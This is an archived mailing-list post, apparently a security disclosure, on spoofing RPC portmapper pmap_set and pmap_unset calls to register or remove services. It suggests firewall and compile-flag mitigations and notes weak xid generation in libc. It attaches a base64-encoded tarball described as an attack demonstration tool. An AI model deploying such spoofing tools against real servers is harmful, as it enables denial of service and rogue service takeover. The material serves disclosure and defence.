This is a multi-part message in MIME format. ------=_NextPart_000_01BE0F5D.320DE860 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit pouet pouet, As every RPC programs, the portmapper has his own remote call procedure (using xdr notation for arguments). These one are : -pmap_dump : this rpc procedure is called when you do a 'rpcinfo -p server'. -pmap_getport : this one is used when a (local || remote) program wants to know on which port a special rpc program is listening on (for example, when ypbind tries to talk to ypserver, it asks first to the portmapper on which port ypserv program is running). -pmap_callit : this is the proxy call for the portmapper.... this flaw has been widely used in order to steal nfs handle, to bypass nfs host control access, or to remotely retrieve files server by ypserv (ie. passwd). Hopefully, Wietse' portmapper secured these security problems by forbidding callit() to rpc.mountd, rpc.nfsd, and yp* rpc programs. -pmap_set : it is called when a rpc program wants to register itself in the portmapper list (rpcinfo -p returns this list). -pmap_unset : same as above but it's used to unregister a rpc program. Again, Wietse' portmapper fixed almost all the holes related to pset/punset rpc calls. However, due to a restriction in the protocol, all the security problems cannot be fixed easily. When a rpc program (such as rpc.mountd) wants to un/register itself on the portmapper list, it sends an udp || tcp packet to the portmapper (port 111) using the pmap_set or pmap_unset respectively. The portmapper checks the validity of the call by determining if the rpc packet comes from the localhost using a priviledged source port (between 512 and 1024 when -DCHECK_PORT option is used while compiling portmapper). Unix authentification is not checked. As you can see, it's not big deal. By spoofing a pmap_set/pmap_unset udp packet, it's possible to register or unregister any RPC programs on the remote host (the program I attached to this mail illustrates this). All in all, this can only lead to a DoS on the server for a _remote_ attacker (by flooding the portmapper with pmap_set request or by unregistering services such as mountd, nfsd or ypserv) but it can be worse because a _local_ attacker can set up rogue rpc programs on the server (registering his own ypbind/ypserv program for example). This last local attack can lead to root compromise (including the hosts which trust the ypserver); but well, it's fairly clear that when an attacker cracked into one of your server, all your systems are almost already compromised. possible solutions : - use a firewall/router that filters ports 111 _and_ 32771 and configure it so that it rejects all packets coming from outside with a source ip which is inside your network (note that it doesn't protect you from an attack coming from your internal network). or - compile your portmapper with -DLOOPBACK_SETUNSET flag.. notice that it's damn hard to implement because you have to change other things in your rpc services as well as in your kernel config. Btw, D.J Bernstein, do you really think that Wietse should have rewritten BIND when he developed his tcpwrappers ? following this idea, maybe he should also rewrite the whole 'libsrc/rpc/*' when he codes his portmapper.. oh come on, he can't be aware of all the security holes even before they have been found, can he ? We all know that Wietse has done a good job with his tcpwrapper/portmapper and the least we could do is to respect him. another last note (maybe not important) : in libc-5.3.12 code, we can see that the xid of an rpc message is not totally random : Mithrandir:/tmp/libsrc/libc/rpc# grep call_msg.rm_xid clnt* -n clnt_tcp.c:207: call_msg.rm_xid = getpid() ^ now.tv_sec ^ now.tv_usec; clnt_udp.c:176: call_msg.rm_xid = getpid() ^ now.tv_sec ^ now.tv_usec; getpid is usually not a high value so higher bits of the xid are defined by the now.tv_usec value. An attacker may easily retrieve the date of the system (ie. port 13) so, with a lot of luck and time, he should be able to guess the next xid (ypbind uses a timeout of 10sec I think). Anyway, this is pure theory and I haven't tried it yet so xid prediction may not be easily done but, guess what, crackers are usually lucky and they have plenty of time to spend on their computers... ga ------=_NextPart_000_01BE0F5D.320DE860 Content-Type: application/octet-stream; name="hoze.tgz" Content-Transfer-Encoding: base64 Content-Description: hoze.tgz (WinZip File) Content-Disposition: attachment; filename="hoze.tgz" H4sIAE5aSzYAA+w6C3BT15VXtgyycMEkJKVNmtxQO9iJLUvGNoYQAgYZWGwQEQ50iVGepSe/50jv KU9P/ixxQlYxQVXUONtkk+3MtrBJJ+TTDJ0hrbswrQMem+1kO26WnWUnmZY22ay8ZnfzIeAQB+05 970nPxnbTGc2u7OzvXB077nn3HPPOffc++7HgvxnfBX5chOtca6sraWEYnJOy3WE1tVVV9fV1tTU uih1OZ2ulYTWfsl6sRSLqpxCKVFkWZ2L71r0/6NJwPHHny+xDxjOOca/2lntrJk2/i5ndS2hzi9R p2z6fz7+j7qbGi0WSxbPI/kEsdGDVlsN5Gu+odXXEEoKSBm5gSwh8xgOsB94AA5BGaEAwAqQD3AG AWgI10P5ep1m0YEloCG8tpQQBGxPijX6UcCPHrHaECIgsAwaz9PpeZA9fxPAq1YbwkHAEebpfVSF xLaqUKAyJEqxbkdUdrgIKYX6coBvTLN/qZ7bdL2NVKTnX9PzJQDzAb6p47cD3KqXCwFuNtm4bFof t2lqkxIAUJss1uspwIJpvGhbqQm3mMoF5NrJrucLTXXXAXwF4Aai+WgRwI067esAy/XyLXpepudf naMf1Lv+CasNeZfpfWwGnOg4ysWxQXwx+SiDftsN9JBV48W1nb5mte1k9MVkPeTdJrwZcsEkD+u7 AS/R+/IBHDTRg9ifCQ8DvAXyrLo8nLtHgL5bp+8jWnxp9CLSh/ro7a+DkU5CPgB4o97fcyZ+Cvw/ gPy0qb+XAM4Cvkrn/zFAGu3V6ScARkGfPF2fX0J+xqTfryGfAP7b9fb/DGCDOdiptz8HsBTwv9Dp H+A4HZzq/xMcD8ArdPplHA/At+g4TvHdgG/Q8QWAC4A36+PxNcAPPWPYbye3At6trwFIvx3wMtN4 rgH8IND36/T1gD8P+FodbwL8iEm/ewEfMOG7AH/mmSl5ey1aPBg4Pw1/CPCzJpzAHPfj3K4lEUWU 1CBp51U+JgaIb+O3tq1v3rKB+HxRVVHlkA/IvCJxIeLbsh3qAnJM9RllXlF8JAK/sgIN5E5eCYbk LhSGssJcKCT7iRyBb0Q7icr+B3kV2HipU1RkiYBkEXHURSsblKCulCjxqo8LBBQS5VVsD6KgQTAS 8/llSVXkEAoXpQABXSV/OAJ8UkCVSZtfjvSgGqoY5uVggGMItg7zYZClSZZUmcN6QY6qbT0SF+aJ LwiKEE7lu1G1TU3bG9Y3+bY3NnrdO3071zc0uX1EI/lACujh7yL+kBzlSVDhoTU4sRuIfIBTOeBp i0Z9+IHEKlBSG5OCAm2uFszT5ljBAi22C5ZoMV0AC00NxMp8GLN6zCHo12AOsbYOc1hIN2IOo7kZ c1hAmzCHxcuDOSy+OzGHhWo35rBg3o85BNYDmMNCG8AcFjEBc1ioQpjDYh7BHBZtFXNYhLoxh0X3 Ycxhkd6POXwEHsccFvCDmMMC/STmEJj9mMNi9QzmsNikt8LKeZKQTG0F1GRKnfocyJSihQIWx85l IJWipQLSxkYZjhYLuOyPDTIcLRfwczN2lOHoAYEifojh6AkBl9OxfoajRwTcAo3tZzh6RqhHPMJw 9JCwDvEHGI6eEjYj7mE4ekzwIL6O4eg5AZe/MSfD0YPCA4hThqMnBTRorJjh6FEhgjhhOHpW6Eb8 wyuIo4eF/cx+hqOnhYPMfoajx4V+Zj/D0fPC88x+huMICIeY/QzHkRCOMPsZjiMiHGX2MxxHRhhg 9jMcR0gYZPYDTvT0rcR7iXOJX1rehn+j8UGr699bWloS/+Lx7hhA3Y4jz9/vT24ssb2Ay/minxZg 5HrST4LI+JA1/SLIEnAhTP+pXnP5i0wm/Y8Q8p70LqjakzqGazTRswELEzh+Sce9x0tAr/jd+EvU r/Qn8zOj8VPW+F0kdmHPqVTdqf7+ftAnft626z6v6+3jA6CE62KqLvFb5+Dkz9DRH79+6deJ05s9 SbfN4020TKZ3gEqJN+NDRcmWyb6/ixUmDxyDRuO39MdPlcSHSxril4s7BzsI/sM26cdA4cTJFH9+ z15f4nzrKezPm2y1deQLR8Awb5pcQcuK+gZjhQO4Fxm/M1UHxNcY8b0vdKJarMn0pp1QNT4/VTeA m4dk6yQKzdoAgpO9RbuEo+izDyah69ZJ18X4kG3VlUWp/4QGidaJVCe5NIyOilX2XVTLD9eAy1cV 1MNv1/UdVMA1JT0+if3axhek6oYJzRQgz6Vh3HIt6sOR67u46HGMtuM4xVJ1SfdE+dlvFx8ctZ5b s7frhkU/OekRTqAKfl0O2JTbj0PrJ27ux6H1s7XvnUdfN3Mv7rBr3C06d+EwsWu8yeaJRT+xeIRf YGcXP2fkjHuiEcx98qswfK6L/ZdGUG2VJib6Mr35qU3zSyYSn5W/mTj9M9QdC5bBcWuqzjWoc96R 2m29inlz4uSb/3arZfTNCUv5qcTZVcMP28Zr+9etGu6tMqt6neHAVzRdxu39Wf81jj0EGhn6FGe7 SAzHP5gYvy/VNTG+A8Ym2Tz57SULdVfeOOXKpbrECuCZ0ZcrP7/al+CIh18XhrD92cuZzFQYpupY zFi9I+5JjAUB52xHfkdemoKYxCkMund65wsj0HT8tg5ryj3pATLE3zrWzZK+wYcLEmfHi/uFX6H0 V0D6AE6YZOtEjnyISG96EqgJ9yRM4PhEJrbGm96HnZwEvO/t2Ne9wvvP4GqGRpwEzg4Lo6MvGoo8 2HOyoTgJM/5TICbdk0YXnUSLezadSMo94Um/BxwjeHKwwDRnhY1QgPA8MPTm6eIDQ4l8o74QCoc/ h34T+YczmG2wBg/nP2u1BRMbbPFTRYyJGNzE3Cy3JttTnlHI9mE1CvOMgt0oLBjZgJtNmMAXpmxh zhIKnjWc8cZnmYxXuD6L/5Dh27P4s5/hUJR0wHfxMvNXVkYyy/MQa/N0FucY/loW36HJEH6frbkH agTLXxqoE9E7s+htiLZm0etYcyo8la0hyDCSRT+aAPRfs+jvEbU+Z6D/MMGagwUJaKatxR62jhWN uN9FB42432ILfPOHieZjrosj7nOIujIj7vc1clrLRrXsjJadxSxdC9KDsHbS9PglrXSjUJ3te9cE C7VitKDXZnl0YTLfk+5kq7EVfCl4gNObbLbtSP8107IIYnfR4z+C2RIf/EF8YsmiJ97ArUdJ34mn rLZUXXc/fmGngD6dixdPoyO8qOdE5z0IUA+wDvAHkPZAVtuXwQJhfxb9HqDgNe8EG3fhhSzhMeT7 bRZVNL47Nb6M+92xEpykYOkofEfGFmdY/Yj7NO6NMu70WAGuUfHeNCz0l/HL7n4fiGwjNX6F8R7G Teb++ntiDcLH0E16/0XmMf3b+YuJV6y2fq/2VfQIi58Hjr0XNfexD+Sqzzt/Bwqh/qk6T/qRCVwZ zm4aewKk9zPZ2ofOk950EUmj8aHixjHZ1LdBX87oZ4CecZ8ba86296T/igl9a2wF1iVvwF0wfIvL R+MT+bGmpPW7nrQP1x/3+cOMtDFuBQNAqB3Fjn6K2hYHE+4hg2wzaMeytMHxhbg+gR83so+SNZh0 DwULMl8E775i6bxOuO15YwQ+ZG1s6FK1MOk+d9tE33Dsxnjv+0Qt6Os9F1uAQjJsUbXGe98lqv0x 92n8xo4X9Mfdpzcmm0/vSO/7VFuUrX3vxG4UvFnh3/2UxXATuAL5cH0m6JbfpLYuSTQfTXlvTm2t STSfQPcz2anjmuhUXWrfRla1IJVkVfPAntTWjYnmgeF5brDm9IGhYKIxLzjSaG3nhhttmeHGwsWA wbFgpLHoUVj4ku7zicZiNPzAULL5aDBhgfIgNlufhwKC8cHzDLMGR9bDbmUkr51r50Ya2MI30oBB lTfSUEQsBw6NNGD85Q3ggZx5qoBt5YxVu2EJq6xPus8aVfOT7jNGeROs8G9lERjr0SxSNH4rjlO2 XbJ5IGExNV2v+bwo2XxiR/pHn2mbzN9h/IzEM5nYQm+aai4euwCxtOin7iGPgLanX77AeD1CAEN8 3yeZDBAHYZ943pNOGTQJab5PcHDe2pFsHgU4A3B2hxBDivsT5KvAkbsvXQ/jFhxxf5hHIFqg8HH+ U/jZvQAfQBB5GVg7ipPNx2CMkd+7K/1PrHUJflFvFV5CeaVQsyvtg969afECU7v6As6zXek/YZU7 EeNfNLai/d7jS9n+GH8z2f3xZPyuzNT+mJhS+lUQAOevWCBCVH+ElJUGaFuPykfL7aTUT0qd1d3E bjeO5lOHbLrF49u88d4t2zY0ET8nLVepwkflUCdP8axMS6N2Aid7LoQYEfhQhK6GSlopgNgo3VMZ a6WVHK2UqBiglTzt5BVaGaERWVFppUojiqzSAB9VxQiNssoA/praKrltp6dZ2q6265filSL8iFJQ jlKuTY5pCuuk6DRStCeq8mEqS7RLEP0CmtHFRSn4SOUD2VYC/AixcFiJCA66U+mhMDFEKUuOwQ8X CFAl4qcxSeymXEwVeEkVg6KfU0V5ipPTOTFDR7QrXJiqMqBoRpiLRMDekBhVsy3QfIUPy+D8qRZB RQ7P2kLCFqCJwYw3G1RW0KFlyyule5bTdrGTBwewZuXZdvy0duD6qFn3yDS65nidqE4nwiDLfjlE yyD4sHeIP+gqIGM08Z28RFVBlB7UR0EVONVhJ2JUiHGKtJpfHVmtro4Rk4UQnFUxCX5x2OUgRhQl fjnAY0TT5e3ccromEJMgWteFe9q5EO+Qlfa1dtKE19i0WVQFhZMCokKrHU6Hk5Z5Q5z/wS5O4ekK h6ucijX1dbQs0F1dWVdH68Nt5Si+3e83nADNVjqq7cQwEZ1JTSYzJ0MUilNRikEHHUii1A7TYzmL 1uU0KsixEOjMw3+1iwc/1LqqKahGXc7qGrt+aVZWToOcGMIILI2uBqmVa6lWshPsDnovFStYzzhB jDKbEFkER4Bii6h2+6SlQwcsJr+SGdNh4FGiKqcGZqZj+hvkiUXBPbMzvQA8UjA6uxBILwJPTwTk dM7O80PgCcsxaS59XmJy2kRpDp6XGU+Ei3YFZuV6Fe16KCar3OyCXgOeaETheubo68coh++eg4OQ Y8CDw/1guH2WkSDkDfThNXgGUB8Yrtgcrv5b4GmTZTXCwfSchecE808sEuBg8ZuF56MteSTih1Gd wzI8WJpz4y0D09onrLZtAHsBJIBHAL4D8H2A1wF+DvArgN8A/AfAFYCFB622WwAceEcOsA1gL4AE 8AjAdwC+D/A6wM8BjHcyfIfCdwl8v8FrKdzJpPdbbfgWNPC41YZXMmV/brXhu0+nRXuXwY3NDbqu ePLDe3vc5pwm2jsW3vng287uA1Yblp2Q4509Xj7iG1bWUFMZdXG6HE7XH1BHNm3YsJqWbdrWUq4t Po6Qo/rq2tn4HNGesMq1Qa4qWi4YJXajHyEOgYsKxBHokYBVy1WFOBQ+5GiLRrVCJKQivwi/rMju tx3sktyhyOya26H9+lVZgUYBLWuXVSaRC4t+oomTZJUHNjkchg/j7KFzVbpJ9wuOAXsT1f1sJOON D9/ICnQ+HGM8Z66zTL1LWnXAd8wFOh+OfRkU+vOm3letegy49PFHPoyVAasWI9P7xTerQp0PY8E5 T4sFbLtYl4fj22Diw9jZPU+LqXydbvBt1WVjbGLs0vm5MVWs5ztMfGX4lgh8h0z6GfbeZ+LDd+lR EDa04Gp595v4cK4cWjJzv21kajzwRvQI8FmtV/ulQy+jfewteikhQl6ufpgiJj7c1y69Kbdfg6/L xEeBj87C94iJD+du2U1aH9P9EtdtRT72Fn6T9g5uNfGh/CfJ1Ps23tvRmyEeTPIMHZ4m2hu3kZBv jQk3/PIcyX2Xvh/41s7At5jkvql/72bt7wSm8/0x/e+l7N//OPxfWh8up7Oupma2v/+pcdXVuKb/ /U917Yo//v3P/0SqusNup9r4wxY/AltqfBeuYoXcw0qZ6SjT6dA2/DKcEZUo7tXbuLZQT7nDTu10 D+zPVCoH4UjEG6eLDt6vVtBV9S4Y2lZgstOdMm2Rgj0VjCvMtYt+kZOw1WZUxg6BYb/q1HyN1M7N eICy31Flt39TlPyhWICna2CLAOcZh7C2sLCwqooC6o/0UF71Oxw5XAFRBqbcqpDYlm0YhBOhdtSp oPh2XkG1PzcwtYCDNDTKaaE94pt4eEWR5BwW7a8RTCwSrwam+s157jer1xOtwj8WmKY01vZE+KjW fhpFuzbJ6V2romyHFeT85h7Y31OZ21xFEyM5skQ4bws8F8DDr6rE/CotEyNCQCm/uqE0veHU6XuL x3Pv9p3bfXeUwzAGeNi68bTJvQ2vd3xbPIXVzqtqWzZ6Cuuvqr3Xs6EQzqfm6vUtOzf7WrZt2Q3R U19jt+taihEfaFmo6QPy92VDEaaE2C7Bid0vcPqtDpxe75qLrsrRGehwiFaYl2mIl9pVYU4WMWC+ iZmTNahw7XIwOLdGamhOuuH6OTvyC7z/wWgsPANTSJbaKWOKipE56QGk996VdXwsYPZ8PTi+cIau 2T3EXTOSArOTDD/PRJsyxqQMLF3mMKix75vZkG4xMKuROPV84Wj7rAz65YwPOpuVB69CfHN0wugz h6GJAX78OfZFYHX34dFHM9BVN1Oc/zdrkDM2ZhIbNrNy7OPD1Lu2Wnq0XFO53MGFtVsf2xV1OZHG mmVNLmQTA1FccPesqG6dQRALFuSJ7nGtbKV3o7x9sO+BVEGXTX05l/VWGAQXELQbqmWo9BShGgna tdSyHMIKIEjB6DLdzClCDRC0CyhdVKFBqQWKdu00rZOVrAneNU0jrGIE7YJpmYngYvpqt0o5arlQ X+0qKVeUC/vA+6Nl0/StRp8Yl0bmPqqxD2kmAlqoXQ/l9lFdB4TsndAyE6Ge2aFfBDGCER77XLW6 +/+rvWNtbts4fhZ+xZlJJEB8045li4Y9jq1M06ZWJnbbD4mHhYijiBEIsHiIYibub+8+7g4HENQj /dCZjvDBFIG9vb29fd+C5iIQY6Q9rYuAOjFA3YxCl8TgmEuXHuwvGWYYA/7KjfzRNHrl5tFvMl24 Rha8oboz+sXc++x506jb9QRJdbQQrvtE9f65kQU20BLHpdAo7AEU2LB2IA8uxJfJoswSsQsEouyB 3DoOQ7gcq7gKtVCrO/Y+/O3HH3ti5DHwXn6Qi7BYQt89R63JfeLqJZmHvQ4Y907vKRCqqDSOHdy1 N71tZDHfM/LTOzVyd1U8tG1hAI5rGx6D6Z+nKyxuY5ASgBMQECpep1EownK1nq0DjHTcuoc8Xl9B JKscCvyNi87kJQR6EOXgbXAite+J9b2BCq0bSBC5XGwXdTvV8davSaenp2AYhPbdcsZjPXhAS8d4 yV2BAK5eMfh0ZcSLeSqAq6tvJsC+w0MAfeKPPOGBhS0Qk3skjrxpE/hFAxjMmUh8y9nztIn/Ypq8 Hk2Tfr+aUaMCyT52kejuqp94r5+OGaV179V4cgITOeLgwHDgmzms24LxpjW0Ms7lTmZgljI44u09 AH3effprUq30i3msbpj5R5ObTk8ToKb/0mC0+6LvusxtYNWb6s9TYNzxpOs+a3/eH3unJ95w4mnq eK9qW6FIUrPxyP2z7dn1lj3Y3YG7+f/HuF+x1xbtXxMQaTYroHqr4EqKCNxnsOmJdCm2MkflIwWC RzO4P+NMw9XGFsJo/ID0yR+zRtD6cl/Bvf1+9sOHs0898fH83V9mP7/9R09oOwFfPO/VqOIP51hu h4d2zDKV/eyPq23nSczBsptXaH/4qWedMxtj4x0CHKSDbPvhb2/P5G2n1bfSom7lLcYZWaMNNOaH M3QLiqAluQi2zs1RssD2dJpCRTR0Qg4JB4ybwcdU5+LECD3AN53tLmP3fB+k2zI7aEgIgV/LWDV4 TVZVu7zLDfngmVuP7Mkk8nBLLLGb3R1Xiq0+qYGeCei/XhKl1gbpZQA+DcH5QSXBllvR0EZ6W0/I B3BRNSOF7HKzTGF0HIFYp3RQnHN2LedlFhVbAd9DcDrG4ZDQI8YZ4nbxr3UBiXJ9u47V/Snspdot TPmvg1gU16wT9isD7mFxDYu2IH9D2o49gd7QMzt77AqhZ/SXRZrEyFAMjhWPIUbG57RuHtDtNgbU 0un++Dkxsu0CXMxqQrkHW3E9KK5nwC0iwxqJPRu0kj0DX8IAPdPB3plRoJTEz0FKtFgYbBif6u6Q zp6VADZ8TFUYYfjX9d2nzLqD2qwuwnrfPNvD7lGT3SXIBJYc9yxzB/7ydviXTfiXNOIyW+eOQpCl 5ZpQ9ASkBT0IN+Qqhc98CxYvCFdwJ8qveiDZUsY9sYjT9XoLjMJMBZF19pIqpi23x+23JyyVLU+e tg941n77+V48Y+Bd2+1x6+0R6zzpaJkHl9IKei2rumPA7JYisltmwLQV/o83HT0I+4Pbklqwk8G1 +YJvMKXJPRmDXU4NpCrgaUIySS2dUPdZsRr8oF4pwIu4Kj0xl3Wnd7+J29utOAK6ZdidbVh3Yrh3 e9admO7dtnUnpge2c92Jb0+b153j2tq/7hx0r7Ywg0Urh6Akc0fBHnQ5KxAZFwO7ILuc91QmC39f o3JRMBws4uCyJzL+SPhD8seaPwr+KPEDkhdnt8yFBQDVh1U1YVkdWDjKqTLeHgbt6BMyQBtZCE1+ 3JwE68B+UqRLsKc3Jwsqi429Hpd/9xV4e7qY2xoDTRvFeubYcbReThvFZH4AX6onqrLLT+BL9cTU RPEJfgmnLRVJeERfwooKDOQxRJxFEJ7DP9PmA5orhwS+cR+CUYanIII2iXbTp830aS992kqfdtKn jZxyZoV756ut8/XO+WbjqixJuPxGq+tRQo9ZoHpfVt2pwvEdPbit4dHIvagH4lV6vSPUosomUKxf TTzlWFGwfxl9hkiFyAYDHUvIOOC2z6dmBE9yB1Ftp9Fp2YGM4ol/dv49rkRRlG8iSE1xWC3bmAeQ xR5FR6c1/dxZ9x2tm51Gbrybw9zV2mkzz2IhutYDRWQORB60Yv8vukI7NEEb0p12USbxoEZbg49l g48kn91ufWEXmQyuEFEoF0EZF6dNLEu9UBVMGGHguzxeles/nH/6+eztuz+dvW9iCRq0sMHyVSbO Cu3xcYE+6tYpAZ002GODW9bRmDZrTEvJL41vVmTgytrwttDKFsamliVwH72ocvegNdGMpnQeTbZ3 7PIL7pDCH7054mIfX7p2c2vPsCUjgupWf6Qc7lgxlylF1VqRKeprq2v3nJ14rfVqL5xXlFvKh+zk D2Vj60cBil0KMrm/oKwbgmJMtipcM+KWqnUd+fr+M0q93dpLPGwmef+ZCnsmjht2DgwM42x0xZ1z aNH+UlX90BX0+acTQGyfVnoGMYW/Wwcjc8Lgn830FGb41qRBkUY2aHdcAYd3Ak8+W8ViqpQ2/BpR Pzw2FefKv6yCLfbTz9PVGlvmBfitpei/BxP37i+zn85//iTI6YPPLXPumKk8ksK2ieIYcWQSe20A B/bnQMY+DzJwQwPx5zIvKMyGKDvHvhWhOvsHA+q2OR7W6nzEm9c+dvR74vffBd945X87nni6er3j Ph76rgBbDsWV8jLeNqh4AvvMVhQDFtKzQ5LIw3X1rzr5UvBZKzyWG9s2g21u16/aSbpWD0nX6hzp uuTX3tTKXKdY5nKq2dF+q7cf1MmNd0tc1XhPYl8opSWKf/fDpQB81DgagrCXRNOtxcTHHo12GQ7+ wiDYt8BUhMxwCNatGKHO1SA4tkeoyLl1hM06Hk2ROgx3GxH8XaNtxjMm8tx+RYeJ0xHXPTF1iZtW dr9vS9WU7IBNwG7F/8feg6a87bqFBqUXVDveLFMIhvOiXCwsnYJcgzLzubiAgHwj4xhL0NjuxjLR f40Wf3Tz7NupucPhA1W3ctcIkX5a7zRSUKOb5yfPxxZUUcSAVXUZ0R2dFPvWmW71VLfXaHwWKswM dZcQ3UD7HaobKK8AQpaXh9LfnvUwtB6GzYcta+03JZwh2ylE6e+/vgH/r4qBxAhmBoeiFAjRMfFR jo1A1Sjd+VMr2OII+a9ScvWZAa0OoKoGyrBljta03ndZDVThj6Ft/OJ5MFLxognQuAdF+BaWBgYU kca81N6J9SpI9SXkLWGQFI1RKHVqGJnoN+PTSTOyBrdhxa1vHG3aQagNDDXPaO9DOWE9bCbFN2sV Qs2p2jCmLVBY17Sg4GsrGEqsBcYNDK2AWsAUIMmYsA6J9HJ4mbQgXo45LTWLYZNy93JqcPsW9EVb CCz3tRYLkaFK3iQeNYnKtZbM5rZjJ8uluVjp8XcOZBtnfdj9WjmZhvsyVGJLharFMntMmK9fD8T4 Xv+qFSQPa68nLH2vgYOzFMIGDwk83AV/6LuGmGbYVlsXyISoamRCWGUyYUW8ulPD6h7RZ0tg3BpO G3iCrzWKtMyUDVGMwXrQAFR/tghWUbz11cH2tPbMsnsvx8YebZZBIa9Zx/kE9BA40xOHZhyfeqpE TIcLfNuzd55/h8zlUp9b9Zz0TBVwVB0tVsUskQc19u2/6iRoDF5TuKrD8iSsAiT6yTIizty6hxQ2 R1lDvjjUCf8Jna2u9KozW7CArE5BDJqZrQGHmIE2bmcD8UMheMB1hMWeTpDD9w4GuA4F8VgoC5It xtoZGNEteOefYgn50jEIK9XVypz6IFQ3eTSP0jLX0+TUT49UQdQerbA7vsO9+h2cNkkLrOwXMpjj keYGv8gbOS8LyTlCtFrHlFWsMOJ2xBHWd/rnE9FPqedfNf5PB/QGyBGEzIwxh3QEy3tIGMxzwegW UZYXVAK8BFz5PIvWhbiKwhAPuTcUk4SpNyBqIXuL20gG5JyDJAJ/a+86khsAcUAC1ck44gpLSeuq Xh9QBXesh0OSULkyT4Qg7XG65kLbxzJxxF+jeZbyOU8+EN8FeYQmWb1oYPlSF88aJOUrYCnJFoxB kRyhu7VySLDM31oocmYM1teCOE/F7DrKihInmNlohIub4hhRWgZ4ukFPg1zFwhizRRg3NAjjkylu PeCH10FcSodfqUBxQyNHogEhpkVYEF/lmnEWPo4iEPQmzMg/5bhJmEluwF0AXfCsIhWCda9adlTk Ml5wD4NsHvz0UEBQMWla66HDS3WRobjXEGQNi/lamzleIf4AImwoMgYJIx+Kk2svSpLk2GiD+Vyu i5y5QI4W1RDt1Sly46APZqTM5hI9YibzHEUf5InOrMx5vg1HVCpNAodxjXnYJWyNe0cmbvq3RB8V GJcAexRZbli4wJowlTnqOEWXLDi86UAYqIundRvfn4klGRwCQlbj4ZKRfFxumiSQ2IMZinFlIHpg RsA7cEU6gPEO5dV7AgHQUBlcQXgFICS4zdGsuJkEQyTBgs+zYFGg3ATVS0Ec4BBhah+ROYqV0VpU ZztECT9QoqDTf9fO/8Fjb8A+gYDYQkcGsybZLH0OnUYW3A40MKZacw7TH3GVpJuE8HMHEZgutdBF dAPbKW9QgkBiHLFNS3GBvcZEYE5aiwOfTk5OxjjlFh0zGD25IUnLUM5wkJIN8Y9IgnIc5TURVfLy 4/n5T9+9BZH5ePbpbx/gHxIb4WKRB2zHoozBj0YXaN7wI8jQ7pHXuJJZImORSAlaRTu1lMH1VqzS 0Gxn7qHnAcsBBh6mBsdSs9qoHo7Nmg/nn7Dqo3uPKJdEQcwCfH8LHi1kANZG6pe2FPNJ9gYso0ow UHbRll3gXpJ7wXeh2fou0jhONygzBcs0yy4oYpFFJLngz4zIp9hiFoGXyKIczBYaVFJivNQ+B0WB cpaJqmjqaK0D95hHF1GM64G1z8Hh4AjxPv2Ie4cihMzFnvhoLi0XfbFV9bMMwyRH3pwSxh945WZK 2/QDogE30ZOA4FfsG7ddAnBjKQ2VVItbZ3hkVlizsSGSN7hn1HWMAQZIEllPepVOaL9lUHGPPs3L Hf6kLmHK53GbFF1yGKyCS8DiwuK9wS6vGpYbEYAcLuIUD6ioZ61EUUMLSXStgP3ZVtt8JslgdcHe hfySFigN2gY+tLfmRZ46/s7lfPVkCIsZ5kvnK5KBv0cB8E9AghKB9UReUYtcLbAY4BatM39Y5hmN xm+OA6r4i3givh6Lzw5y30wu58uUS33iVHw9ArNUPYJ4UIydRQTD/ZHD54tAaZhS0Ov/82vELb6O RFeM/+loZBQo9UvVmQNP+5L+XdO/Bf4LZJycnKAFMZM9aJSYvD4ci9dDCGaGSRnHQFIi2zjI6LkJ br92UARfk+aIeitoGLZr9UBYa3IE+w2GEtwfh3f5oEJ1BoK7tRsgtDlW+FRHjRKqTK7jYM5qFggY UFr9wgrBVPvvBFKJIEThx7YzsqugIFEuremNgnIUQ2wl/Ybt5F91FhfpjVlQpbZEotIei3qDGDWK 9BazZ6QHHQcTrEax0tpuUc+iXApCGXysKsgKWA/CIDdZZQEJaNmZVlh8UxSbNMm56hmVhTDoKEAw /AmaHEIeSNoZdIY5kSJDDv5gLWZe5+B8gbhoVqCQ3n2EKBuC5q32MQnFVXleV3gsLqYZvroJSJ0D 4ohmk7JEiqWgos73mCfdBOgQekgtMJziM/JHnBtQ7LCGh5fUzmuWvNHVzFPHqY6zT//9FWLBegEq zWazGazTUhZ4cO7YfT/saAQfpzD7VM0LrgluzHxNN0HNGkWwJiRGNrdCfkt/VZAnz14KwZ6hDUrN fIKvtO9APa3POhkhLnArbSCMqAHSfjVYWDdDat/AFE2Qqc+fP0dThATU+CtevHhBxsxhRVX5I/xp mWrg+c6G1WfjiuQzM93oZvIywAnHJ/vms9CRwScTM8yz+XAJhmw9VLuypHy1JiBVeP8oHBrkWYN2 3G8lA47zaSkbeowbTPmUNqFgUNrzPu5zB5dBqRMl+47RZ6wMozXJykQn15TJc0yn7ZIDfvgGJUio HKoebg+zlKoYKQZIOifgrCOvpR0m4U618aT4fSB+pnNQFULbo1Xayea3kS9yYhqRUWRs+smFxKMr Cm5TJlX/rwJgRgsw65BbobFT6TzXSi7TOASjn5Wx9oIQYAdmkegVgqVceebnDvoqwUCLSIQ3c417 pRpqKmqkgahwGdChL4R7V2jUKcA/e/v+r2c6ZuOZSdcxtocdBQUE5gm5WOCHylmNoaZoYQNeCNIY ZAfuXqHDX8oyJCQ1Il8GKEKc32yFK+U8HySbciDD8nS4Li+GBnZQBBnkNEKJAxBRZZmcGzTT1d4u RZAfQYJUxmibmBYIb/ISNhRdHIVCKooISGmqjBqyKax0qKQiJrkD8SVWMSaL7aQiWLwiJLrIR/0K O7nPm2pjkUmw++/PPu5m57wOVIjCTmrf4E9X/K9/IOTxerwer8fr8Xq8Hq/H6/F6vB6v/5vrP1Gl 7u4AeAAA ------=_NextPart_000_01BE0F5D.320DE860--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:14 PDT